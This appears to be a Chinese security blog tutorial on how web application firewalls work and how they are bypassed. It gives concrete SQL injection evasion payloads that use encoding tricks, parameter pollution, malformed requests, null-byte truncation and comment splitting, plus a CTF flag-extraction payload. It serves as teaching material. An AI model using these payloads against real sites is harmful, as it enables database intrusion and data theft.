<!DOCTYPE html>


<html lang="zh-CN">


<head>
  <meta charset="utf-8" />
   
  <meta name="keywords" content="博客文章密码," />
   
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    关于WAF那些事 |  Time
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

</head>

</html>

<body>
  
  <canvas width="1777" height="841" style="position: fixed; left: 0px; top: 0px; z-index: 999; pointer-events: none;"></canvas>
  
  <div id="app">
    <main class="content on">
      <section class="outer">
  <article id="post-关于WAF那些事" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  关于WAF那些事
</h1>
 

    </header>
    

    
    <div class="article-meta">
      <a href="/2019/07/23/%E5%85%B3%E4%BA%8EWAF%E9%82%A3%E4%BA%9B%E4%BA%8B/" class="article-date">
  <time datetime="2019-07-23T07:42:26.000Z" itemprop="datePublished">2019-07-23</time>
</a>
      
  <div class="article-category">
    <a class="article-category-link" href="/categories/WAF/">WAF</a>
  </div>

      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">4.9k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">19 分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      
      

      
      <p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gn0ylxmahfj30sg0sg0xc.jpg" alt="99"></p>
<a id="more"></a>

<h3 id="0x01什么是waf"><a href="#0x01什么是waf" class="headerlink" title="0x01什么是waf"></a>0x01什么是waf</h3><h4 id="概念简述"><a href="#概念简述" class="headerlink" title="概念简述"></a>概念简述</h4><p>首先WAF（Web Application Firewall），俗称Web应用防火墙，主要的目的实际上是用来过滤不正常或者恶意请求包，以及为服务器打上临时补丁的作用。</p>
<h5 id="1、云waf："><a href="#1、云waf：" class="headerlink" title="1、云waf："></a>1、云waf：</h5><blockquote>
<p>在配置云waf时（通常是CDN包含的waf），DNS需要解析到CDN的ip上去，在请求uri时，数据包就会先经过云waf进行检测，如果通过再将数据包流给主机。常见产品：阿里云防护，腾讯云防护，创宇云之类等。</p>
</blockquote>
<h5 id="2、主机防护软件："><a href="#2、主机防护软件：" class="headerlink" title="2、主机防护软件："></a>2、主机防护软件：</h5><blockquote>
<p>在主机上预先安装了这种防护软件，和监听web端口的流量是否有恶意的，所以这种从功能上讲较为全面。这里再插一嘴，mod_security、ngx-lua-waf这类开源waf虽然看起来不错，但是有个弱点就是升级的成本会高一些。常见产品：云锁，安全狗之类产品。</p>
</blockquote>
<h5 id="3、硬件WAF："><a href="#3、硬件WAF：" class="headerlink" title="3、硬件WAF："></a>3、硬件WAF：</h5><blockquote>
<p>硬件WAF可以理解为流量代理，一般部署方式都需要流量经过它，针对数据包进行拆包-&gt;清洗-&gt;规则命中-&gt;放行/丢弃，当然现在更有甚者，给WAF上了一个头脑，采用深度学习，语义分析等操作，来减少本身WAF因为单调的规则导致可能被绕过的问题。常见产品：各产品铁盒子waf</p>
</blockquote>
<h4 id="为什么WAF可被绕过"><a href="#为什么WAF可被绕过" class="headerlink" title="为什么WAF可被绕过"></a>为什么WAF可被绕过</h4><ul>
<li>业务与安全存在一定的冲突。</li>
<li>WAF无法100%覆盖语言，中间件，数据库的特性。</li>
<li>WAF本身漏洞。</li>
</ul>
<h3 id="0x02-waf绕过方式"><a href="#0x02-waf绕过方式" class="headerlink" title="0x02 waf绕过方式"></a>0x02 waf绕过方式</h3><h4 id="1、Web容器的特性"><a href="#1、Web容器的特性" class="headerlink" title="1、Web容器的特性"></a>1、Web容器的特性</h4><h5 id="特殊的百分号"><a href="#特殊的百分号" class="headerlink" title="特殊的百分号"></a>特殊的百分号</h5><p>在 <strong>IIS+ASP</strong> 的环境中，对于URL请求的参数值中的<code>%</code>，如果和后面的字符构成的字符串在 <strong>URL编码表</strong> 之外，ASP脚本处理时会将其忽略。</p>
<p>假设现在有个url是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.test.com&#x2F;test.asp?id&#x3D;1 union se%lect 1,2,3,4 fro%m adm%in</span><br></pre></td></tr></table></figure>

<p>再经过 <strong>IIS+ASP</strong> 中处理之后。</p>
<p><img src="https://i.imgur.com/mPw1hob.jpg" alt=""></p>
<p>到达服务器上的实际是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.test.com&#x2F;test.asp?id&#x3D;1 union all select 1,2,3,4 from admin</span><br></pre></td></tr></table></figure>

<p>原理是因为在WAF层，获取到的id参数值为<code>1 union all se%lect 1,2,3,4 fro%m adm%in</code>，此时waf因为 <strong>%</strong> 的分隔，无法检测出关键字 <strong>select</strong>  <strong>from</strong> 等。</p>
<p>但是因为IIS的特性，最后在服务器上解析的时候， <strong>id</strong> 获取的实际参数就变为<code>1 union all select 1,2,3,4 from admin</code>，从而绕过了waf。</p>
<p><strong>PS:这个特性仅在iis+asp上 asp.net并不存在</strong></p>
<h5 id="unicode编码"><a href="#unicode编码" class="headerlink" title="unicode编码"></a>unicode编码</h5><p>IIS支持Unicode编码字符的解析，但是某些WAF却不一定具备这种能力。(已知 <strong>s</strong> 的unicode编码为: <strong>%u0053</strong> ,  <strong>f</strong> 的unicode编码为 <strong>%u0066</strong> )。</p>
<p>假设现在有个链接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.test.com&#x2F;test.asp?id&#x3D;1 union %u0053elect 1,2,3,4 %u0066rom admin</span><br></pre></td></tr></table></figure>

<p>当该请求到达WAF之后，WAF获取的数值是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1 union %u0053elect 1,2,3,4 %u0066rom admin</span><br></pre></td></tr></table></figure>

<p>由于数据清洗等其他原因，WAF取出脏数据，进行规则匹配的时候，可能理解只是一个 <strong>union</strong> ，不会将其阻断，那么经过到达 <strong>IIS中间件</strong> 的时候， <strong>IIS</strong> 会做如下处理：</p>
<p><img src="https://i.imgur.com/52WUYRI.jpg" alt=""></p>
<p>最后服务器和数据库最终获取到的参数会是:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1 union select 1,2,3,4 from admin</span><br></pre></td></tr></table></figure>

<p>此方法还存在另外一种情况，多个不同的widechar可能会被转换为同一个字符。例如：<a href="https://weibo.com/p/1001603843609647549905" target="_blank" rel="noopener">WideChar和MultiByte字符转换问题</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">s%u0065lect-&gt;select</span><br><span class="line">s%u00f0lect-&gt;select</span><br></pre></td></tr></table></figure>

<p>PS：</p>
<p>其实不止这个，还有很多类似的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">字母a：</span><br><span class="line">%u0000</span><br><span class="line">%u0041</span><br><span class="line">%u0061</span><br><span class="line">%u00aa</span><br><span class="line">%u00e2</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">单引号：</span><br><span class="line">%u0027</span><br><span class="line">%u02b9</span><br><span class="line">%u02bc</span><br><span class="line">%u02c8</span><br><span class="line">%u2032</span><br><span class="line">%uff07</span><br><span class="line">%c0%27</span><br><span class="line">%c0%a7</span><br><span class="line">%e0%80%a7</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">空白：</span><br><span class="line">%u0020</span><br><span class="line">%uff00</span><br><span class="line">%c0%20</span><br><span class="line">%c0%a0</span><br><span class="line">%e0%80%a0</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">左括号(：</span><br><span class="line">%u0028</span><br><span class="line">%uff08</span><br><span class="line">%c0%28</span><br><span class="line">%c0%a8</span><br><span class="line">%e0%80%a8</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">右括号)：</span><br><span class="line">%u0029</span><br><span class="line">%uff09</span><br><span class="line">%c0%29</span><br><span class="line">%c0%a9</span><br><span class="line">%e0%80%a9</span><br></pre></td></tr></table></figure>

<h5 id="HPP-HTTP-Parameter-Pollution-HTTP参数污染"><a href="#HPP-HTTP-Parameter-Pollution-HTTP参数污染" class="headerlink" title="HPP(HTTP Parameter Pollution): HTTP参数污染"></a>HPP(HTTP Parameter Pollution): HTTP参数污染</h5><p>在HTTP协议中是允许同样名称的参数出现多次的。</p>
<p>例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.test.com&#x2F;test.asp?id&#x3D;123&amp;id&#x3D;456</span><br></pre></td></tr></table></figure>

<p><img src="https://i.imgur.com/Yc98Fuq.jpg" alt=""></p>
<p>假设提交的参数即为：</p>
<p>id=1&amp;id=2&amp;id=3</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Asp.net + iis：id&#x3D;1,2,3 </span><br><span class="line">Asp + iis：id&#x3D;1,2,3 </span><br><span class="line">Php + apache&#x2F;nginx：id&#x3D;3</span><br></pre></td></tr></table></figure>

<p>所以对于这类过滤规则，假设利用以下payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;union+select+password&#x2F;*&amp;id&#x3D;*&#x2F;from+admin</span><br></pre></td></tr></table></figure>

<p>来逃避对 <strong>select * from</strong> 的检测。因为HPP特性，id的参数值最终会变为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">union select password&#x2F;*,*&#x2F;from admin</span><br></pre></td></tr></table></figure>

<p><img src="https://i.imgur.com/IhBDcLo.jpg" alt=""></p>
<p>上面的例子是一个ASP的，再举例一个PHP的例子，代码如下：</p>
<p><img src="https://i.imgur.com/RrgRoSX.png" alt=""></p>
<ul>
<li>1、对于传入的非法的 <strong>$_GET</strong> 数组参数名，会将他们转换成 <strong>下划线</strong> 。经过fuzz，有以下这些字符。</li>
</ul>
<p><img src="https://i.imgur.com/Z8THOB8.jpg" alt=""></p>
<ul>
<li>2、php在遇到相同参数时接受的是第二个参数。</li>
</ul>
<p><img src="https://i.imgur.com/j8PKNYz.png" alt=""></p>
<ul>
<li>3、通过 <strong>$_SERVER[‘REQUEST_URI’]</strong> 方式获得的参数并不会对参数中的某些特殊字符进行转换。</li>
</ul>
<p><img src="https://i.imgur.com/J33lJmt.png" alt=""></p>
<p>这里的代码中有两个waf。</p>
<p>第一个WAF在代码 <strong>第29行-第30行</strong> ，这里面采用了 <strong>dowith_sql()</strong> 函数，跟进一下 <strong>dowith_sql()</strong> 函数，该函数主要功能代码在 <strong>第19-第26行</strong> ，如果 <strong>$_REQUEST</strong> 数组中的数据存在 <strong>select|insert|update|delete</strong> 等敏感关键字或者是字符，则直接 <strong>exit()</strong> 。如果不存在，则原字符串返回。</p>
<p>而第二个WAF在代码 <strong>第33行-第39行</strong> ，这部分代码通过 <strong>$_SERVER[‘REQUEST_URI’]</strong> 的方式获取参数，然后使用 <strong>explode</strong> 函数针对 <strong>&amp;</strong> 进行分割，获取到每个参数的参数名和参数值。然后针对每个参数值调用 <strong>dhtmlspecialchars()</strong> 函数进行过滤，跟进一下 <strong>dhtmlspecialchars()</strong> 函数，发现其相关功能代码在 <strong>第3行-第14行</strong> ，这个函数主要功能是针对 <strong>‘&amp;’, ‘“‘, ‘&lt;’, ‘&gt;’, ‘(‘, ‘)’</strong> 等特殊字符进行过滤替换，最后返回替换后的内容。</p>
<p>由于 <strong>第44行和第45行</strong> 代码我们可以看到，这题的参数获取都是通过 <strong>REQUEST</strong> 方式，因此我们来看个例子。</p>
<p><img src="https://i.imgur.com/FyE6kct.png" alt=""></p>
<p>第一次 <strong>$_REQUEST</strong> 仅仅只会输出 <strong>i_d=2</strong> 的原因是因为php自动将 <strong>i.d</strong> 替换成了 <strong>i_d</strong> 。而根据我们前面说的第二个特性，出现了两个 <strong>i_d</strong> ，php会自动使用第二个变量覆盖第一个，因此第一次 <strong>$_REQUEST</strong> 输出的是2。</p>
<p>第二次 <strong>$_REQUEST</strong> 会输出 <strong>i_d=select&amp;i.d=2</strong> 是因为 <strong>$_SERVER[‘REQUEST_URI’]</strong> 并不会对特殊的符号进行替换，因此结果会原封不动的输出。</p>
<p>所以这题payload如何构造，我们可以先来看个思维导图。</p>
<p><img src="https://i.imgur.com/0uW4ENG.png" alt=""></p>
<ul>
<li><ol>
<li>我们通过页面请求 <strong>i_d=padyload&amp;i.d=123</strong> 。</li>
</ol>
</li>
<li><ol start="2">
<li>当数据流到达第一个WAF时，由于我们开始的第一个知识点已经介绍过了，php会将参数中的某些特殊符号替换为下划线。因此便得到了两个 <strong>i_d</strong> ，所以此时的payload变成了 <strong>i_d=payload&amp;i.d=123</strong> 。</li>
</ol>
</li>
<li><ol start="3">
<li>前面我们介绍了，如果参数相同的情况下，默认 <strong>第二个参数传入的值</strong> 会覆盖 <strong>第一个参数传入的值</strong> 。因此此时在第一个WAF中 <strong>i_d=123</strong> ，不存在其他特殊的字符，因此绕过了第一个WAF。</li>
</ol>
</li>
<li><ol start="4">
<li>当数据流到达进入到第二个WAF时，由于代码是通过 <strong>$_SERVER[‘REQUEST_URI’]</strong> 取参数，而我们前面开头的第三个知识点已经介绍过了 <strong>$_SERVER[‘REQUEST_URI’]</strong> 是不会将参数中的特殊符号进行转换，因此这里的 <strong>i.d</strong> 参数并不会被替换为 <strong>i_d</strong> ，所以此时正常来说 <strong>i.d</strong> 和 <strong>i_d</strong> 都能经过第二个WAF。</li>
</ol>
</li>
<li><ol start="5">
<li>第二个WAF中有一个 <strong>dhtmlspecialchars()</strong> 函数，作用前面我们已经介绍过了，这里需要绕过它，其实很好绕过。绕过之后 <strong>i_d=payload&amp;i.d=123</strong> 便会进入到业务层代码中，执行SQL语句，由于这里的SQL语句采用拼接的方式，因此存在SQL注入。</li>
</ol>
</li>
</ul>
<p>因此最后payload如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/index.php?submit=&amp;i_d=-1/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&amp;i.d=123</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.imgur.com/pNgXFgB.png" alt=""></p>
<h5 id="畸形HTTP请求"><a href="#畸形HTTP请求" class="headerlink" title="畸形HTTP请求"></a>畸形HTTP请求</h5><p>当前的HTTP服务依据的是RFC2616标准的HTTP请求，但是当我们向Web服务器发送畸形的，也就是并非这个标准的HTTP数据包的时候，由于Web服务器的一些兼容性的特性，会尽力解析这些畸形的数据包。但是如果Web服务器和WAF针对畸形数据包解析的差距，就可能会出现一些Bypass的情况。以下是正常的数据包：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;test.php?id&#x3D;1%20union&#x2F;**&#x2F;select&#x2F;**&#x2F;1,2,3&#x2F;**&#x2F;from&#x2F;**&#x2F;admin  HTTP&#x2F;1.1</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;70.0.3538.77 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9</span><br><span class="line">Cookie: ECS[visit_times]&#x3D;2</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">....</span><br></pre></td></tr></table></figure>

<p>如果我们将数据包修改为这样：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">L1nk3r &#x2F;test.php?id&#x3D;1%20union&#x2F;**&#x2F;select&#x2F;**&#x2F;1,2,3&#x2F;**&#x2F;from&#x2F;**&#x2F;admin </span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;70.0.3538.77 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9</span><br><span class="line">Cookie: ECS[visit_times]&#x3D;2</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">....</span><br></pre></td></tr></table></figure>

<p>由于 <strong>L1nk3r</strong> 并不是标准HTTP协议中的请求方法，也没有协议字段 <strong>HTTP/1.1</strong> ，也没有 <strong>host</strong> 字段。如果是在 <strong>HTTP/1.1</strong> 协议中，缺少 <strong>host</strong> 字段一般会返回 <strong>400 bad request</strong> 。但是某些版本的Apache在处理这个请求时，默认会设置协议为 <strong>HTTP/0.9</strong> ， <strong>host</strong> 则默认使用 <strong>apache</strong> 默认的 <strong>servername</strong> ，这种畸形的请求仍然能够被处理。</p>
<p>如果某些WAF在处理数据的时候严格按照GET、POST等标准HTTP方法来获取数据，或者采用正则匹配的方式来处理数据，那么这个时候就有可能因为WAF和WEB服务解析的前后不对等，绕过了这个WAF。</p>
<h4 id="2、-Web应用层的问题"><a href="#2、-Web应用层的问题" class="headerlink" title="2、    Web应用层的问题"></a>2、    Web应用层的问题</h4><h5 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h5><p>通过一般WAF会针对传来的数据包中带有的编码进行一次解码工作，如果WAF不能进行有效解码还原攻击向量，可能导致绕过，<strong>常见编码如URL编码、unicode编码（IIS）、宽字节编码等。</strong>例如我们用 <strong>url</strong> 的二次编码，而经过一次 <strong>url</strong> 解码的之后，WAF可能无法识别出它是恶意的数据，当把该恶意数据放行到Web服务器上时，Web服务器会再一次解码，最后导致了WAF绕过的结果。</p>
<p><img src="https://i.imgur.com/Yghv7vB.jpg" alt=""></p>
<p>看个实际例子：</p>
<p><img src="https://i.imgur.com/WjYm1h5.png" alt=""></p>
<h5 id="多数据来源的问题"><a href="#多数据来源的问题" class="headerlink" title="多数据来源的问题"></a>多数据来源的问题</h5><p>一般来说Web服务器从三个位置来获取用户传入的数据：</p>
<ul>
<li>从GET中获取</li>
<li>如果GET中没有，尝试从POST中查找需要的值</li>
<li>若GET和POST中都没有，尝试从Cookie中获取想要的值。</li>
</ul>
<p>典型的例子就如 <strong>ASP</strong> 和 <strong>ASP.NET</strong> ，这两种语言中的 <strong>Request</strong> 对象对于请求数据包的解析并没有按照RFC的标准来，一般开发者如果按照下面方式获取数据：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ID&#x3D;Request(&#39;ID&#39;);</span><br><span class="line">ID&#x3D;Request.Params(ID);</span><br></pre></td></tr></table></figure>

<p>会出现以下这种情况：</p>
<p><img src="https://i.imgur.com/cukm1cQ.jpg" alt=""></p>
<p>在PHP情况下，我们看到是通过 <strong>request</strong> 方式传入数据，而php中<a href="http://php.net/manual/zh/reserved.variables.request.php" target="_blank" rel="noopener">REQUEST</a>变量默认情况下包含了 <strong>GET</strong> ，<strong>POST</strong> 和 <strong>COOKIE</strong> 的数组。在 <strong>php.ini</strong> 配置文件中，有一个参数 <strong>variables_order</strong> ，这参数有以下可选项目</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">; variables_order</span><br><span class="line">;   Default Value: &quot;EGPCS&quot;</span><br><span class="line">;   Development Value: &quot;GPCS&quot;</span><br><span class="line">;   Production Value: &quot;GPCS&quot;</span><br></pre></td></tr></table></figure>

<p>这些字母分别对应的是 <strong>E: Environment</strong> ，<strong>G:Get</strong>，<strong>P:Post</strong>，<strong>C:Cookie</strong>，<strong>S:Server</strong>。这些字母的出现顺序，表明了数据的加载顺序。而 <strong>php.ini</strong> 中这个参数默认的配置是 <strong>GPCS</strong> ，也就是说如果有 <strong>POST</strong> 方式传入相同的数组，就覆盖掉 <strong>GET</strong> 方式传入的。</p>
<p><img src="https://i.imgur.com/GgcwXe6.png" alt=""></p>
<p>我们看个简单的例子</p>
<p><img src="https://i.imgur.com/xcZSVP3.png" alt=""></p>
<p>那个利用这个特性呢，实际上也可以bypasswaf，我们看下图中的例子：</p>
<p><img src="https://i.imgur.com/b2SvepO.png" alt=""></p>
<h4 id="3、WAF自身的问题"><a href="#3、WAF自身的问题" class="headerlink" title="3、WAF自身的问题"></a>3、WAF自身的问题</h4><h5 id="白名单机制"><a href="#白名单机制" class="headerlink" title="白名单机制"></a>白名单机制</h5><p>WAF存在某些机制，不处理和拦截白名单中的请求数据：</p>
<ul>
<li><p>1、指定IP或IP段的数据。</p>
</li>
<li><p>2、来自于搜索引擎爬虫的访问数据。</p>
</li>
<li><p>3、其他特征的数据。</p>
</li>
</ul>
<p>以前某些WAF为了不影响站点的SEO优化，将User-Agent为某些搜索引擎（如谷歌）的请求当作白名单处理，不检测和拦截。伪造HTTP请求的User-Agent非常容易，只需要将HTTP请求包中的User-Agent修改为谷歌搜索引擎的User-Agent即可畅通无阻。</p>
<h5 id="数据获取方式存在缺陷"><a href="#数据获取方式存在缺陷" class="headerlink" title="数据获取方式存在缺陷"></a>数据获取方式存在缺陷</h5><ul>
<li>1、某些WAF无法全面支持GET、POST、Cookie等各类请求包的检测，当GET请求的攻击数据包无法绕过时，转换成POST可能就绕过去了。或者，若POST以 <strong>Content-Type: application/x-www-form-urlencoded</strong> 无法绕过时，转换成上传包格式的 <strong>Content-Type: multipart/form-data</strong> 也许就可以绕过了。</li>
</ul>
<p><img src="https://i.imgur.com/FUrND1k.png" alt=""></p>
<p>当然关于文件上传的话，可以试试将关键字换行分离试试看。下面看个例子：</p>
<p><img src="https://i.imgur.com/ReszrFA.png" alt=""></p>
<p>对于网站来说，这样写是可以解析的，但是站在WAF的设计者的立场，他们可能并不知道，这个是可以这样写的。当用正则表达式去获取上传的文件名时，正则表达式就匹配不到了，所以上传就被绕过了。</p>
<ul>
<li>2、某些WAF从数据包中提取检测特征的方式存在缺陷，如正则表达式不完善，某些攻击数据因为某些干扰字符的存在而无法被提取，常见的如%0a、%0b、%0c、%0d、%09、%0a等。之前某论坛流传的一个fuzz过某狗的脚本，代码主要如下：</li>
</ul>
<p><img src="https://i.imgur.com/RPlobFq.png" alt=""></p>
<p>主要上面代码中有两个关键fuzz的内容， <strong>fuzz_zs</strong> 和 <strong>fuzz_ch</strong> ，其实主要来说还是利用mysql的一些特性，bypass一些正则表达式针对关键字的检查，例如 <strong>union</strong> 、 <strong>select</strong> 之类的。</p>
<h5 id="数据处理不恰当"><a href="#数据处理不恰当" class="headerlink" title="数据处理不恰当"></a>数据处理不恰当</h5><h6 id="1、-00截断"><a href="#1、-00截断" class="headerlink" title="1、%00截断"></a>1、%00截断</h6><p>对于 <strong>%00</strong> 进行URL解码，实际上解码出来的就是C语言中的NULL字符，如果WAF对获取到的数据存储和处理不当，那么 <strong>%00</strong> 解码后会将后面的数据截断，造成后面的数据没有经过检测。</p>
<p><img src="https://i.imgur.com/ipRew2B.jpg" alt=""></p>
<p>WAF在获取到参数id的值并解码后，参数值将被截断成<code>1/*</code>，因此没有命中规则，从而放过了。</p>
<h6 id="2、-amp-字符处理"><a href="#2、-amp-字符处理" class="headerlink" title="2、&amp;字符处理"></a>2、&amp;字符处理</h6><p>某些WAF在对HTTP请求数据包中的参数进行检测时，使用 <strong>&amp;</strong> 字符对多个参数进行分割，然后分别进行检测，如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.test.com&#x2F;1.php?p1&#x3D;1&amp;p2&#x3D;2&amp;p3&#x3D;3</span><br></pre></td></tr></table></figure>

<p>这些WAF会使用&amp;符号分割p1、p2和p3，然后对其参数值进行检测。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">p1&#x3D;1</span><br><span class="line">p2&#x3D;2</span><br><span class="line">p3&#x3D;3</span><br></pre></td></tr></table></figure>

<p>但是，如果遇到这种构造：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.test.com&#x2F;1.php?p1&#x3D;1+union&#x2F;*%26x1&#x3D;1*&#x2F;+select&#x2F;*%26x2&#x3D;1*&#x2F;1,2,3+from+admin</span><br></pre></td></tr></table></figure>

<p>WAF会将以上参数分割成如下3部分：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">p1&#x3D;1+union&#x2F;*</span><br><span class="line">x1&#x3D;1*&#x2F;+select&#x2F;*</span><br><span class="line">x2&#x3D;1*&#x2F;1,2,3+from+admin</span><br></pre></td></tr></table></figure>

<p>由于目标服务器就只有一个参数 <strong>p1</strong> ，然后 <strong>x1</strong> 和 <strong>x2</strong> 是不存在的， <strong>%26</strong> 是 <strong>&amp;</strong> 符号的 <strong>url编码</strong> ，如果WAF针对上述的三个参数进行分别的检测，是不会报注入的。这里巧妙就巧妙在利用两个参数拼接注释符号将不存在的 <strong>x1</strong> 和 <strong>x2</strong> 注释了。所以最后实际上进入数据库查询的语句也就只有。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">p1&#x3D;1+union+select1,2,3+from+admin</span><br></pre></td></tr></table></figure>

<h4 id="数据清洗不恰当"><a href="#数据清洗不恰当" class="headerlink" title="数据清洗不恰当"></a>数据清洗不恰当</h4><p>当攻击者提交的参数值中存在大量干扰数据时，如大量空格、TAB、换行、%0c、注释等，一般waf都是清洗之后再进行规则匹配，因为如果干扰字符串过多的话检测需要消耗大量的资源和性能，所以清洗后可以提升性能降低匹配规则的复杂度，筛选出真实的攻击数据进行检测，以提高检查性能，节省资源。如果WAF对数据的清洗不恰当，会导致真实的攻击数据被清洗，剩余的数据无法被检测出攻击行为。</p>
<p>例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;test&#x2F;Article.php?id&#x3D;9999-&quot;&#x2F;*&quot; union all select 1,2,3,4,5 as &quot;*&#x2F;&quot; from mysql.user</span><br></pre></td></tr></table></figure>

